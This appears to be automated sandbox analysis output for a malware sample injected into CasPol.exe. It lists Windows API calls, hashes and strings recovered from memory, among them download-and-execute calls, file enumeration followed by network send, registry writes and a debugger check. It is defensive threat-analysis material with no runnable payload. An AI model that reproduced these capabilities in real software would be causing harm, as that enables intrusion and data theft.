                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                                                                            • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 2299586839-711371036
                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID: SETTINGS
                                                                                                            • API String ID: 3473537107-594951305
                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 745075371-0
                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1157919129-0
                                                                                                            • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                                                                                                            • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                            • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                                                                                                            • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                            • _free.LIBCMT ref: 00448077
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 00448243
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 1286116820-0
                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                            • API String ID: 2825088817-4197237851
                                                                                                            • Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                                                                                                            • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                            • Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                                                                                                            • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                            • String ID: x@G$x@G
                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                            • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                                                                                                            • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                            • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                                                                                                            • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                            • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                            • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 4212172061-0
                                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 301083792-0
                                                                                                            • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                                                                                                            • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                            • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                                                                                                            • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829624132-0
                                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                                                                                                            • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                            • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                                                                            • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                            • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1663032902-0
                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                            • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                            • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                            • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2692324296-0
                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                            • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                            • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                            • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                            APIs
                                                                                                              • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                            • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                            • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                            • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
